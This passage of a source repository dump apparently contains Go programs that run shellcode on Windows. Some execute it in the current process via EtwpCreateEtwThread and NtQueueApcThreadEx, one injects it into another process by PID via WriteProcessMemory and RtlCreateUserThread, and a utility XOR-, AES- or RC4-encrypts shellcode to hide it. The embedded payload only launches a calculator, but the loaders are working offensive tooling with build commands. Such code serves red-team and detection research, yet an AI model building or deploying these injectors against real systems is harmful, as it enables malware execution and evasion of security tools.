struct { 120 | ModuleName uintptr // The name of the enumerated module 121 | ModuleBase uintptr // The base address of the module 122 | ModuleSize uintptr // The size of the module, in bytes 123 | UserContext uintptr // Optional user-defined data 124 | } 125 | -------------------------------------------------------------------------------- /cmd/EtwpCreateEtwThread/main.go: -------------------------------------------------------------------------------- 1 | // +build windows 2 | 3 | /* 4 | This program executes shellcode in the current process using the following steps 5 | 1. Allocate memory for the shellcode with VirtualAlloc setting the page permissions to Read/Write 6 | 2. Use the RtlCopyMemory macro to copy the shellcode to the allocated memory space 7 | 3. Change the memory page permissions to Execute/Read with VirtualProtect 8 | 4. Call EtwpCreateEtwThread on shellcode address 9 | 5. Call WaitForSingleObject so the program does not end before the shellcode is executed 10 | 11 | This program loads the DLLs and gets a handle to the used procedures itself instead of using the windows package directly. 12 | */ 13 | 14 | // Demonstrates using ntdll.dll!EtwpCreateThreadEtw for local shellcode execution: https://gist.github.com/TheWover/b2b2e427d3a81659942f4e8b9a978dc3 15 | 16 | package main 17 | 18 | import ( 19 | "encoding/hex" 20 | "flag" 21 | "fmt" 22 | "log" 23 | "unsafe" 24 | 25 | // Sub Repositories 26 | "golang.org/x/sys/windows" 27 | ) 28 | 29 | const ( 30 | // MEM_COMMIT is a Windows constant used with Windows API calls 31 | MEM_COMMIT = 0x1000 32 | // MEM_RESERVE is a Windows constant used with Windows API calls 33 | MEM_RESERVE = 0x2000 34 | // PAGE_EXECUTE_READ is a Windows constant used with Windows API calls 35 | PAGE_EXECUTE_READ = 0x20 36 | // PAGE_READWRITE is a Windows constant used with Windows API calls 37 | PAGE_READWRITE = 0x04 38 | ) 39 | 40 | func main() { 41 | verbose := flag.Bool("verbose", false, "Enable verbose output") 42 | debug := flag.Bool("debug", false, "Enable debug output") 43 | flag.Parse() 44 | 45 | // Pop Calc Shellcode 46 | shellcode, errShellcode := hex.DecodeString("505152535657556A605A6863616C6354594883EC2865488B32488B7618488B761048AD488B30488B7E3003573C8B5C17288B741F204801FE8B541F240FB72C178D5202AD813C0757696E4575EF8B741F1C4801FE8B34AE4801F799FFD74883C4305D5F5E5B5A5958C3") 47 | if errShellcode != nil { 48 | log.Fatal(fmt.Sprintf("[!]there was an error decoding the string to a hex byte array: %s", errShellcode.Error())) 49 | } 50 | 51 | if *debug { 52 | fmt.Println("[DEBUG]Loading kernel32.dll and ntdll.dll") 53 | } 54 | kernel32 := windows.NewLazySystemDLL("kernel32.dll") 55 | ntdll := windows.NewLazySystemDLL("ntdll.dll") 56 | 57 | if *debug { 58 | fmt.Println("[DEBUG]Loading VirtualAlloc, VirtualProtect and RtlCopyMemory procedures") 59 | } 60 | VirtualAlloc := kernel32.NewProc("VirtualAlloc") 61 | VirtualProtect := kernel32.NewProc("VirtualProtect") 62 | RtlCopyMemory := ntdll.NewProc("RtlCopyMemory") 63 | EtwpCreateEtwThread := ntdll.NewProc("EtwpCreateEtwThread") 64 | WaitForSingleObject := kernel32.NewProc("WaitForSingleObject") 65 | 66 | if *debug { 67 | fmt.Println("[DEBUG]Calling VirtualAlloc for shellcode") 68 | } 69 | addr, _, errVirtualAlloc := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_READWRITE) 70 | 71 | if errVirtualAlloc != nil && errVirtualAlloc.Error() != "The operation completed successfully." { 72 | log.Fatal(fmt.Sprintf("[!]Error calling VirtualAlloc:\r\n%s", errVirtualAlloc.Error())) 73 | } 74 | 75 | if addr == 0 { 76 | log.Fatal("[!]VirtualAlloc failed and returned 0") 77 | } 78 | 79 | if *verbose { 80 | fmt.Println(fmt.Sprintf("[-]Allocated %d bytes", len(shellcode))) 81 | } 82 | 83 | if *debug { 84 | fmt.Println("[DEBUG]Copying shellcode to memory with RtlCopyMemory") 85 | } 86 | _, _, errRtlCopyMemory := RtlCopyMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 87 | 88 | if errRtlCopyMemory != nil && errRtlCopyMemory.Error() != "The operation completed successfully." { 89 | log.Fatal(fmt.Sprintf("[!]Error calling RtlCopyMemory:\r\n%s", errRtlCopyMemory.Error())) 90 | } 91 | if *verbose { 92 | fmt.Println("[-]Shellcode copied to memory") 93 | } 94 | 95 | if *debug { 96 | fmt.Println("[DEBUG]Calling VirtualProtect to change memory region to PAGE_EXECUTE_READ") 97 | } 98 | 99 | oldProtect := PAGE_READWRITE 100 | _, _, errVirtualProtect := VirtualProtect.Call(addr, uintptr(len(shellcode)), PAGE_EXECUTE_READ, uintptr(unsafe.Pointer(&oldProtect))) 101 | if errVirtualProtect != nil && errVirtualProtect.Error() != "The operation completed successfully." { 102 | log.Fatal(fmt.Sprintf("Error calling VirtualProtect:\r\n%s", errVirtualProtect.Error())) 103 | } 104 | if *verbose { 105 | fmt.Println("[-]Shellcode memory region changed to PAGE_EXECUTE_READ") 106 | } 107 | 108 | if *debug { 109 | fmt.Println("[DEBUG]Calling EtwpCreateEtwThread...") 110 | } 111 | //var lpThreadId uint32 112 | thread, _, errEtwThread := EtwpCreateEtwThread.Call(addr, uintptr(0)) 113 | 114 | if errEtwThread != nil && errEtwThread.Error() != "The operation completed successfully." { 115 | log.Fatal(fmt.Sprintf("[!]Error calling EtwpCreateEtwThread:\r\n%s", errEtwThread.Error())) 116 | } 117 | 118 | if *verbose { 119 | fmt.Println("[+]Shellcode Executed") 120 | } 121 | 122 | if *debug { 123 | fmt.Println("[DEBUG]Calling WaitForSingleObject...") 124 | } 125 | 126 | _, _, errWaitForSingleObject := WaitForSingleObject.Call(thread, 0xFFFFFFFF) 127 | if errWaitForSingleObject != nil && errWaitForSingleObject.Error() != "The operation completed successfully." { 128 | log.Fatal(fmt.Sprintf("[!]Error calling WaitForSingleObject:\r\n:%s", errWaitForSingleObject.Error())) 129 | } 130 | } 131 | 132 | // export GOOS=windows GOARCH=amd64;go build -o goEtwpCreateEtwThread.exe cmd/EtwpCreateEtwThread/main.go 133 | -------------------------------------------------------------------------------- /cmd/NtQueueApcThreadEx-Local/main.go: -------------------------------------------------------------------------------- 1 | // +build windows 2 | 3 | /* 4 | This program executes shellcode in the current process using the following steps 5 | 1. Allocate memory for the shellcode with VirtualAlloc setting the page permissions to Read/Write 6 | 2. Use the RtlCopyMemory macro to copy the shellcode to the allocated memory space 7 | 3. Change the memory page permissions to Execute/Read with VirtualProtect 8 | 4. Get a handle to the current thread 9 | 4. Execute the shellcode in the current thread by creating a "Special User APC" through the NtQueueApcThreadEx function 10 | 11 | References: 12 | 1. https://repnz.github.io/posts/apc/user-apc/ 13 | 2. https://docs.rs/ntapi/0.3.1/ntapi/ntpsapi/fn.NtQueueApcThreadEx.html 14 | 3. https://0x00sec.org/t/process-injection-apc-injection/24608 15 | 4. https://twitter.com/aionescu/status/992264290924032005 16 | 5. http://www.opening-windows.com/techart_windows_vista_apc_internals2.htm#_Toc229652505 17 | 18 | */ 19 | 20 | package main 21 | 22 | import ( 23 | "encoding/hex" 24 | "flag" 25 | "fmt" 26 | "log" 27 | "unsafe" 28 | 29 | // Sub Repositories 30 | "golang.org/x/sys/windows" 31 | ) 32 | 33 | const ( 34 | // MEM_COMMIT is a Windows constant used with Windows API calls 35 | MEM_COMMIT = 0x1000 36 | // MEM_RESERVE is a Windows constant used with Windows API calls 37 | MEM_RESERVE = 0x2000 38 | // PAGE_EXECUTE_READ is a Windows constant used with Windows API calls 39 | PAGE_EXECUTE_READ = 0x20 40 | // PAGE_READWRITE is a Windows constant used with Windows API calls 41 | PAGE_READWRITE = 0x04 42 | ) 43 | 44 | // https://docs.microsoft.com/en-us/windows/win32/midl/enum 45 | const ( 46 | QUEUE_USER_APC_FLAGS_NONE = iota 47 | QUEUE_USER_APC_FLAGS_SPECIAL_USER_APC 48 | QUEUE_USER_APC_FLGAS_MAX_VALUE 49 | ) 50 | 51 | func main() { 52 | verbose := flag.Bool("verbose", false, "Enable verbose output") 53 | debug := flag.Bool("debug", false, "Enable debug output") 54 | flag.Parse() 55 | 56 | // Pop Calc Shellcode 57 | shellcode, errShellcode := hex.DecodeString("505152535657556A605A6863616C6354594883EC2865488B32488B7618488B761048AD488B30488B7E3003573C8B5C17288B741F204801FE8B541F240FB72C178D5202AD813C0757696E4575EF8B741F1C4801FE8B34AE4801F799FFD74883C4305D5F5E5B5A5958C3") 58 | if errShellcode != nil { 59 | log.Fatal(fmt.Sprintf("[!]there was an error decoding the string to a hex byte array: %s", errShellcode.Error())) 60 | } 61 | 62 | if *debug { 63 | fmt.Println("[DEBUG]Loading kernel32.dll and ntdll.dll...") 64 | } 65 | kernel32 := windows.NewLazySystemDLL("kernel32.dll") 66 | ntdll := windows.NewLazySystemDLL("ntdll.dll") 67 | 68 | if *debug { 69 | fmt.Println("[DEBUG]Loading VirtualAlloc, VirtualProtect, and RtlCopyMemory procedures...") 70 | } 71 | VirtualAlloc := kernel32.NewProc("VirtualAlloc") 72 | VirtualProtect := kernel32.NewProc("VirtualProtect") 73 | GetCurrentThread := kernel32.NewProc("GetCurrentThread") 74 | RtlCopyMemory := ntdll.NewProc("RtlCopyMemory") 75 | NtQueueApcThreadEx := ntdll.NewProc("NtQueueApcThreadEx") 76 | 77 | if *debug { 78 | fmt.Println("[DEBUG]Calling VirtualAlloc for shellcode...") 79 | } 80 | addr, _, errVirtualAlloc := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_READWRITE) 81 | 82 | if errVirtualAlloc != nil && errVirtualAlloc.Error() != "The operation completed successfully." { 83 | log.Fatal(fmt.Sprintf("[!]Error calling VirtualAlloc:\r\n%s", errVirtualAlloc.Error())) 84 | } 85 | 86 | if addr == 0 { 87 | log.Fatal("[!]VirtualAlloc failed and returned 0") 88 | } 89 | 90 | if *verbose { 91 | fmt.Println(fmt.Sprintf("[-]Allocated %d bytes", len(shellcode))) 92 | } 93 | 94 | if *debug { 95 | fmt.Println("[DEBUG]Copying shellcode to memory with RtlCopyMemory...") 96 | } 97 | _, _, errRtlCopyMemory := RtlCopyMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 98 | 99 | if errRtlCopyMemory != nil && errRtlCopyMemory.Error() != "The operation completed successfully." { 100 | log.Fatal(fmt.Sprintf("[!]Error calling RtlCopyMemory:\r\n%s", errRtlCopyMemory.Error())) 101 | } 102 | if *verbose { 103 | fmt.Println("[-]Shellcode copied to memory") 104 | } 105 | 106 | if *debug { 107 | fmt.Println("[DEBUG]Calling VirtualProtect to change memory region to PAGE_EXECUTE_READ...") 108 | } 109 | 110 | oldProtect := PAGE_READWRITE 111 | _, _, errVirtualProtect := VirtualProtect.Call(addr, uintptr(len(shellcode)), PAGE_EXECUTE_READ, uintptr(unsafe.Pointer(&oldProtect))) 112 | if errVirtualProtect != nil && errVirtualProtect.Error() != "The operation completed successfully." { 113 | log.Fatal(fmt.Sprintf("Error calling VirtualProtect:\r\n%s", errVirtualProtect.Error())) 114 | } 115 | if *verbose { 116 | fmt.Println("[-]Shellcode memory region changed to PAGE_EXECUTE_READ") 117 | } 118 | 119 | if *debug { 120 | fmt.Println("[DEBUG]Calling GetCurrentThread...") 121 | } 122 | thread, _, err := GetCurrentThread.Call() 123 | if err.Error() != "The operation completed successfully." { 124 | log.Fatal(fmt.Sprintf("Error calling GetCurrentThread:\n%s", err)) 125 | } 126 | if *verbose { 127 | fmt.Printf("[-]Got handle to current thread: %v\n", thread) 128 | } 129 | 130 | if *debug { 131 | fmt.Println("[DEBUG]Calling NtQueueApcThreadEx...") 132 | } 133 | //USER_APC_OPTION := uintptr(QUEUE_USER_APC_FLAGS_SPECIAL_USER_APC) 134 | _, _, err = NtQueueApcThreadEx.Call(thread, QUEUE_USER_APC_FLAGS_SPECIAL_USER_APC, uintptr(addr), 0, 0, 0) 135 | if err.Error() != "The operation completed successfully." { 136 | log.Fatal(fmt.Sprintf("Error calling NtQueueApcThreadEx:\n%s", err)) 137 | } 138 | if *verbose { 139 | fmt.Println("[-]Queued special user APC") 140 | } 141 | 142 | if *verbose { 143 | fmt.Println("[+]Shellcode Executed") 144 | } 145 | 146 | } 147 | 148 | // export GOOS=windows GOARCH=amd64;go build -o goNtQueueApcThreadEx-Local.exe cmd/NtQueueApcThreadEx-Local/main.go 149 | -------------------------------------------------------------------------------- /cmd/RtlCreateUserThread/main.go: -------------------------------------------------------------------------------- 1 | // +build windows 2 | 3 | /* 4 | This program executes shellcode in a remote process using the following steps 5 | 1. Get a handle to the target process 6 | 1. Allocate memory for the shellcode with VirtualAllocEx setting the page permissions to Read/Write 7 | 2. Use the WriteProcessMemory to copy the shellcode to the allocated memory space in the remote process 8 | 3. Change the memory page permissions to Execute/Read with VirtualProtectEx 9 | 4. Execute the entrypoint of the shellcode in the remote process with RtlCreateUserThread 10 | 5. Close the handle to the remote process 11 | 12 | This program loads the DLLs and gets a handle to the used procedures itself instead of using the windows package directly. 13 | */ 14 | 15 | package main 16 | 17 | import ( 18 | "encoding/hex" 19 | "flag" 20 | "fmt" 21 | "log" 22 | "os" 23 | "unsafe" 24 | 25 | // Sub Repositories 26 | "golang.org/x/sys/windows" 27 | ) 28 | 29 | func main() { 30 | verbose := flag.Bool("verbose", false, "Enable verbose output") 31 | debug := flag.Bool("debug", false, "Enable debug output") 32 | // To hardcode the Process Identifier (PID), change 0 to the PID of the target process 33 | pid := flag.Int("pid", 0, "Process ID to inject shellcode into") 34 | flag.Usage = func() { 35 | flag.PrintDefaults() 36 | os.Exit(0) 37 | } 38 | flag.Parse() 39 | 40 | // Pop Calc Shellcode 41 | shellcode, errShellcode := hex.DecodeString("505152535657556A605A6863616C6354594883EC2865488B32488B7618488B761048AD488B30488B7E3003573C8B5C17288B741F204801FE8B541F240FB72C178D5202AD813C0757696E4575EF8B741F1C4801FE8B34AE4801F799FFD74883C4305D5F5E5B5A5958C3") 42 | if errShellcode != nil { 43 | log.Fatal(fmt.Sprintf("[!]there was an error decoding the string to a hex byte array: %s", errShellcode.Error())) 44 | } 45 | 46 | kernel32 := windows.NewLazySystemDLL("kernel32.dll") 47 | ntdll := windows.NewLazySystemDLL("ntdll.dll") 48 | 49 | OpenProcess := kernel32.NewProc("OpenProcess") 50 | VirtualAllocEx := kernel32.NewProc("VirtualAllocEx") 51 | VirtualProtectEx := kernel32.NewProc("VirtualProtectEx") 52 | WriteProcessMemory := kernel32.NewProc("WriteProcessMemory") 53 | RtlCreateUserThread := ntdll.NewProc("RtlCreateUserThread") 54 | CloseHandle := kernel32.NewProc("CloseHandle") 55 | 56 | if *debug { 57 | fmt.Println(fmt.Sprintf("[DEBUG]Getting a handle to Process ID (PID) %d...", *pid)) 58 | } 59 | pHandle, _, errOpenProcess := OpenProcess.Call(windows.PROCESS_CREATE_THREAD|windows.PROCESS_VM_OPERATION|windows.PROCESS_VM_WRITE|windows.PROCESS_VM_READ|windows.PROCESS_QUERY_INFORMATION, 0, uintptr(uint32(*pid))) 60 | 61 | if errOpenProcess != nil && errOpenProcess.Error() != "The operation completed successfully." { 62 | log.Fatal(fmt.Sprintf("[!]Error calling OpenProcess:\r\n%s", errOpenProcess.Error())) 63 | } 64 | if *verbose { 65 | fmt.Println(fmt.Sprintf("[-]Successfully got a handle to process %d", *pid)) 66 | } 67 | 68 | if *debug { 69 | fmt.Println(fmt.Sprintf("[DEBUG]Calling VirtualAllocEx on PID %d...", *pid)) 70 | } 71 | addr, _, errVirtualAlloc := VirtualAllocEx.Call(uintptr(pHandle), 0, uintptr(len(shellcode)), windows.MEM_COMMIT|windows.MEM_RESERVE, windows.PAGE_READWRITE) 72 | 73 | if errVirtualAlloc != nil && errVirtualAlloc.Error() != "The operation completed successfully." { 74 | log.Fatal(fmt.Sprintf("[!]Error calling VirtualAlloc:\r\n%s", errVirtualAlloc.Error())) 75 | } 76 | 77 | if addr == 0 { 78 | log.Fatal("[!]VirtualAllocEx failed and returned 0") 79 | } 80 | if *verbose { 81 | fmt.Println(fmt.Sprintf("[-]Successfully allocated memory in PID %d", *pid)) 82 | } 83 | 84 | if *debug { 85 | fmt.Println(fmt.Sprintf("[DEBUG]Calling WriteProcessMemory on PID %d...", *pid)) 86 | } 87 | _, _, errWriteProcessMemory := WriteProcessMemory.Call(uintptr(pHandle), addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 88 | 89 | if errWriteProcessMemory != nil && errWriteProcessMemory.Error() != "The operation completed successfully." { 90 | log.Fatal(fmt.Sprintf("[!]Error calling WriteProcessMemory:\r\n%s", errWriteProcessMemory.Error())) 91 | } 92 | if *verbose { 93 | fmt.Println(fmt.Sprintf("[-]Successfully wrote shellcode to PID %d", *pid)) 94 | } 95 | 96 | if *debug { 97 | fmt.Println(fmt.Sprintf("[DEBUG]Calling VirtualProtectEx on PID %d...", *pid)) 98 | } 99 | oldProtect := windows.PAGE_READWRITE 100 | _, _, errVirtualProtectEx := VirtualProtectEx.Call(uintptr(pHandle), addr, uintptr(len(shellcode)), windows.PAGE_EXECUTE_READ, uintptr(unsafe.Pointer(&oldProtect))) 101 | if errVirtualProtectEx != nil && errVirtualProtectEx.Error() != "The operation completed successfully." { 102 | log.Fatal(fmt.Sprintf("Error calling VirtualProtectEx:\r\n%s", errVirtualProtectEx.Error())) 103 | } 104 | if *verbose { 105 | fmt.Println(fmt.Sprintf("[-]Successfully change memory permissions to PAGE_EXECUTE_READ in PID %d", *pid)) 106 | } 107 | 108 | if *debug { 109 | fmt.Println(fmt.Sprintf("[DEBUG]Calling RtlCreateUserThread on PID %d...", *pid)) 110 | } 111 | var tHandle uintptr 112 | _, _, errRtlCreateUserThread := RtlCreateUserThread.Call(uintptr(pHandle), 0, 0, 0, 0, 0, addr, 0, uintptr(unsafe.Pointer(&tHandle)), 0) 113 | 114 | if errRtlCreateUserThread != nil && errRtlCreateUserThread.Error() != "The operation completed successfully." { 115 | log.Fatal(fmt.Sprintf("Error calling RtlCreateUserThread:\r\n%s", errRtlCreateUserThread.Error())) 116 | } 117 | if *verbose { 118 | fmt.Println(fmt.Sprintf("[-]Successfully called RtlCreateUserThread on PID %d", *pid)) 119 | } 120 | 121 | if *debug { 122 | fmt.Println(fmt.Sprintf("[DEBUG]Calling CloseHandle on PID %d...", *pid)) 123 | } 124 | _, _, errCloseHandle := CloseHandle.Call(uintptr(uint32(pHandle))) 125 | if errCloseHandle != nil && errCloseHandle.Error() != "The operation completed successfully." { 126 | log.Fatal(fmt.Sprintf("[!]Error calling CloseHandle:\r\n%s", errCloseHandle.Error())) 127 | } 128 | if *verbose { 129 | fmt.Println(fmt.Sprintf("[-]Successfully closed the handle to PID %d", *pid)) 130 | } 131 | 132 | } 133 | 134 | // export GOOS=windows GOARCH=amd64;go build -o goRtlCreateUserThread.exe cmd/RtlCreateUserThread/main.go 135 | -------------------------------------------------------------------------------- /cmd/ShellcodeUtils/main.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "crypto/aes" 5 | "crypto/cipher" 6 | "crypto/rand" 7 | "crypto/rc4" 8 | "encoding/base64" 9 | "encoding/hex" 10 | "flag" 11 | "fmt" 12 | "io" 13 | "io/ioutil" 14 | "os" 15 | "path/filepath" 16 | "strings" 17 | 18 | // X Packages 19 | "golang.org/x/crypto/argon2" 20 | 21 | // 3rd Party 22 | "github.com/fatih/color" 23 | ) 24 | 25 | func main() { 26 | verbose := flag.Bool("v", false, "Enable verbose output") 27 | encryptionType := flag.String("type", "", "The type of encryption to use [xor, aes256, rc4, null]") 28 | key := flag.String("key", "", "Encryption key") 29 | b64 := flag.Bool("base64", false, "Base64 encode the output. Can be used with or without encryption") 30 | input := flag.String("i", "", "Input file path of binary file") 31 | output := flag.String("o", "", "Output file path") 32 | mode := flag.String("mode", "encrypt", "Mode of operation to perform on the input file [encrypt,decrypt]") 33 | salt := flag.String("salt", "", "Salt, in hex, used to generate an AES256 32-byte key through Argon2. Only used during decryption") 34 | inputNonce := flag.String("nonce", "", "Nonce, in hex, used to decrypt an AES256 input file. Only used during decryption") 35 | flag.Usage = func() { 36 | flag.PrintDefaults() 37 | os.Exit(0) 38 | } 39 | flag.Parse() 40 | 41 | // Check to make sure the input file exists 42 | _, errInputFile := os.Stat(*input) 43 | 44 | if os.IsNotExist(errInputFile) { 45 | color.Red(fmt.Sprintf("[!]The file does not exist: %s", *input)) 46 | os.Exit(1) 47 | } 48 | 49 | shellcode, errShellcode := ioutil.ReadFile(*input) 50 | 51 | if errShellcode != nil { 52 | color.Red(fmt.Sprintf("[!]%s", errShellcode.Error())) 53 | os.Exit(1) 54 | } 55 | 56 | // Check to make sure an output file was provided 57 | if *output == "" { 58 | color.Red("[!]The -o output argument is required") 59 | os.Exit(1) 60 | } 61 | 62 | // Check to make sure the output directory exists 63 | dir, outFile := filepath.Split(*output) 64 | if *verbose { 65 | color.Yellow(fmt.Sprintf("[-]Output directory: %s", dir)) 66 | color.Yellow(fmt.Sprintf("[-]Output file name: %s", outFile)) 67 | } 68 | 69 | outDir, errOutDir := os.Stat(dir) 70 | if errOutDir != nil { 71 | color.Red(fmt.Sprintf("[!]%s", errOutDir.Error())) 72 | os.Exit(1) 73 | } 74 | 75 | if !outDir.IsDir() { 76 | color.Red(fmt.Sprintf("[!]The output directory does not exist: %s", dir)) 77 | } 78 | 79 | if *verbose { 80 | color.Yellow(fmt.Sprintf("[-]File contents (hex): %x", shellcode)) 81 | } 82 | 83 | if strings.ToUpper(*mode) != "ENCRYPT" && strings.ToUpper(*mode) != "DECRYPT" { 84 | color.Red("[!]Invalid mode provided. Must be either encrypt or decrypt") 85 | os.Exit(1) 86 | } 87 | 88 | // Make sure a key was provided 89 | if *encryptionType != "" { 90 | if *key == "" { 91 | color.Red("[!]A key must be provided with the -key parameter to encrypt the input file") 92 | os.Exit(1) 93 | } 94 | } 95 | 96 | var outputBytes []byte 97 | 98 | switch strings.ToUpper(*mode) { 99 | case "ENCRYPT": 100 | var encryptedBytes []byte 101 | switch strings.ToUpper(*encryptionType) { 102 | case "XOR": 103 | // https://kylewbanks.com/blog/xor-encryption-using-go 104 | if *verbose { 105 | color.Yellow(fmt.Sprintf("[-]XOR encrypting input file with key: %s", *key)) 106 | } 107 | encryptedBytes = make([]byte, len(shellcode)) 108 | tempKey := *key 109 | for k, v := range shellcode { 110 | encryptedBytes[k] = v ^ tempKey[k%len(tempKey)] 111 | } 112 | case "AES256": 113 | // https://github.com/gtank/cryptopasta/blob/master/encrypt.go 114 | if *verbose { 115 | color.Yellow("[-]AES256 encrypting input file") 116 | } 117 | 118 | // Generate a salt that is used to generate a 32 byte key with Argon2 119 | salt := make([]byte, 32) 120 | _, errReadFull := io.ReadFull(rand.Reader, salt) 121 | if errReadFull != nil { 122 | color.Red(fmt.Sprintf("[!]%s", errReadFull.Error())) 123 | os.Exit(1) 124 | } 125 | color.Green(fmt.Sprintf("[+]Argon2 salt (hex): %x", salt)) 126 | 127 | // Generate Argon2 ID key from input password using a randomly generated salt 128 | aesKey := argon2.IDKey([]byte(*key), salt, 1, 64*1024, 4, 32) 129 | // I leave it up to the operator to use the password + salt for decryption or just the Argon2 key 130 | color.Green(fmt.Sprintf("[+]AES256 key (32-bytes) derived from input password %s (hex): %x", *key, aesKey)) 131 | 132 | // Generate AES Cipher Block 133 | cipherBlock, err := aes.NewCipher(aesKey) 134 | if err != nil { 135 | color.Red(fmt.Sprintf("[!]%s", err.Error())) 136 | } 137 | gcm, errGcm := cipher.NewGCM(cipherBlock) 138 | if err != nil { 139 | color.Red(fmt.Sprintf("[!]%s", errGcm.Error())) 140 | os.Exit(1) 141 | } 142 | 143 | // Generate a nonce (or IV) for use with the AES256 function 144 | nonce := make([]byte, gcm.NonceSize()) 145 | _, errNonce := io.ReadFull(rand.Reader, nonce) 146 | if errNonce != nil { 147 | color.Red(fmt.Sprintf("[!]%s", errNonce.Error())) 148 | os.Exit(1) 149 | } 150 | 151 | color.Green(fmt.Sprintf("[+]AES256 nonce (hex): %x", nonce)) 152 | 153 | encryptedBytes = gcm.Seal(nil, nonce, shellcode, nil) 154 | case "RC4": 155 | if *verbose { 156 | color.Yellow("[-]RC4 encrypting input file") 157 | } 158 | cipher, err := rc4.NewCipher([]byte(*key)) 159 | if err != nil { 160 | color.Red(fmt.Sprintf("[!]%s", err.Error())) 161 | os.Exit(1) 162 | } 163 | encryptedBytes = make([]byte, len(shellcode)) 164 | cipher.XORKeyStream(encryptedBytes, shellcode) 165 | case "": 166 | if *verbose { 167 | color.Yellow("[-]No encryption type provided, continuing on...") 168 | } 169 | encryptedBytes = append(encryptedBytes, shellcode...) 170 | default: 171 | color.Red(fmt.Sprintf("[!]Invalid method type: %s", *encryptionType)) 172 | os.Exit(1) 173 | } 174 | 175 | if len(encryptedBytes) <= 0 { 176 | color.Red("[!]Encrypted byte slice length is equal to or less than 0") 177 | os.Exit(1) 178 | } 179 | if *b64 { 180 | outputBytes = make([]byte, base64.StdEncoding.EncodedLen(len(encryptedBytes))) 181 | base64.StdEncoding.Encode(outputBytes, encryptedBytes) 182 | } else { 183 | outputBytes = append(outputBytes, encryptedBytes...) 184 | } 185 | case "DECRYPT": 186 | var decryptedBytes []byte 187 | switch strings.ToUpper(*encryptionType) { 188 | case "AES256": 189 | // https://github.com/gtank/cryptopasta/blob/master/encrypt.go 190 | if *verbose { 191 | color.Yellow("[-]AES256 decrypting input file") 192 | } 193 | // I leave it up to the operator to use the password + salt for decryption or just the Argon2 key 194 | if *salt == "" { 195 | color.Red("[!]A 32-byte salt in hex format must be provided with the -salt argument to decrypt AES256 input file") 196 | os.Exit(1) 197 | } 198 | if len(*salt) != 64 { 199 | color.Red("[!]A 32-byte salt in hex format must be provided with the -salt argument to decrypt AES256 input file") 200 | color.Red(fmt.Sprintf("[!]A %d byte salt was provided", len(*salt)/2)) 201 | os.Exit(1) 202 | } 203 | 204 | saltDecoded, errSaltDecoded := hex.DecodeString(*salt) 205 | if errShellcode != nil { 206 | color.Red(fmt.Sprintf("[!]%s", errSaltDecoded.Error())) 207 | os.Exit(1) 208 | } 209 | if *verbose { 210 | color.Yellow("[-]Argon2 salt (hex): %x", saltDecoded) 211 | } 212 | 213 | aesKey := argon2.IDKey([]byte(*key), saltDecoded, 1, 64*1024, 4, 32) 214 | if *verbose { 215 | color.Yellow("[-]AES256 key (hex): %x", aesKey) 216 | } 217 | 218 | cipherBlock, err := aes.NewCipher(aesKey) 219 | if err != nil { 220 | color.Red(fmt.Sprintf("[!]%s", err.Error())) 221 | } 222 | 223 | gcm, errGcm := cipher.NewGCM(cipherBlock) 224 | if err != nil { 225 | color.Red(fmt.Sprintf("[!]%s", errGcm.Error())) 226 | os.Exit(1) 227 | } 228 | 229 | if len(shellcode) < gcm.NonceSize() { 230 | color.Red("[!]Malformed ciphertext is larger than nonce") 231 | os.Exit(1) 232 | } 233 | 234 | if len(*inputNonce) != gcm.NonceSize()*2 { 235 | color.Red("[!]A nonce, in hex, must be provided with the -nonce argument to decrypt the AES256 input file") 236 | color.Red(fmt.Sprintf("[!]A %d byte nonce was provided but %d byte nonce was expected", len(*inputNonce)/2, gcm.NonceSize())) 237 | os.Exit(1) 238 | } 239 | decryptNonce, errDecryptNonce := hex.DecodeString(*inputNonce) 240 | if errDecryptNonce != nil { 241 | color.Red("[!]%s", errDecryptNonce.Error()) 242 | os.Exit(1) 243 | } 244 | if *verbose { 245 | color.Yellow(fmt.Sprintf("[-]AES256 nonce (hex): %x", decryptNonce)) 246 | } 247 | 248 | var errDecryptedBytes error 249 | decryptedBytes, errDecryptedBytes = gcm.Open(nil, decryptNonce, shellcode, nil) 250 | if errDecryptedBytes != nil { 251 | color.Red("[!]%s", errDecryptedBytes.Error()) 252 | os.Exit(1) 253 | } 254 | case "XOR": 255 | // https://kylewbanks.com/blog/xor-encryption-using-go 256 | if *verbose { 257 | color.Yellow(fmt.Sprintf("[-]XOR decrypting input file with key: %s", *key)) 258 | } 259 | decryptedBytes = make([]byte, len(shellcode)) 260 | tempKey := *key 261 | for k, v := range shellcode { 262 | decryptedBytes[k] = v ^ tempKey[k%len(tempKey)] 263 | } 264 | case "RC4": 265 | if *verbose { 266 | color.Yellow("[-]RC4 decrypting input file") 267 | } 268 | cipher, err := rc4.NewCipher([]byte(*key)) 269 | if err != nil { 270 | color.Red(fmt.Sprintf("[!]%s", err.Error())) 271 | os.Exit(1) 272 | } 273 | decryptedBytes = make([]byte, len(shellcode)) 274 | cipher.XORKeyStream(decryptedBytes, shellcode) 275 | default: 276 | color.Red("[!]Invalid method") 277 | os.Exit(1) 278 | } 279 | if len(decryptedBytes) <= 0 { 280 | color.Red("[!]Decrypted byte slice length is equal to or less than 0") 281 | os.Exit(1) 282 | } 283 | if *b64 { 284 | outputBytes = make([]byte, base64.StdEncoding.EncodedLen(len(decryptedBytes))) 285 | base64.StdEncoding.Encode(outputBytes, decryptedBytes) 286 | } else { 287 | outputBytes = append(outputBytes, decryptedBytes...) 288 | } 289 | } 290 | 291 | if *verbose { 292 | if *b64 { 293 | color.Green("[+]Output (string):\r\n") 294 | fmt.Println(fmt.Sprintf("%s", outputBytes)) 295 | } else { 296 | color.Green("[+]Output (hex):\r\n") 297 | fmt.Println(fmt.Sprintf("%x", outputBytes)) 298 | } 299 | } 300 | 301 | // Write the file 302 | err := ioutil.WriteFile(*output, outputBytes, 0660) 303 | if err != nil { 304 | color.Red(fmt.Sprintf("[!]%s", err.Error())) 305 | os.Exit(1) 306 | } 307 | color.Green(fmt.Sprintf("[+]%s %s input and wrote %d bytes to: %s", *encryptionType, *mode, len(outputBytes), *output)) 308 | 309 | } 310 | -------------------------------------------------------------------------------- /cmd/Syscall/main.go: -------------------------------------------------------------------------------- 1 | // +build windows 2 | 3 | 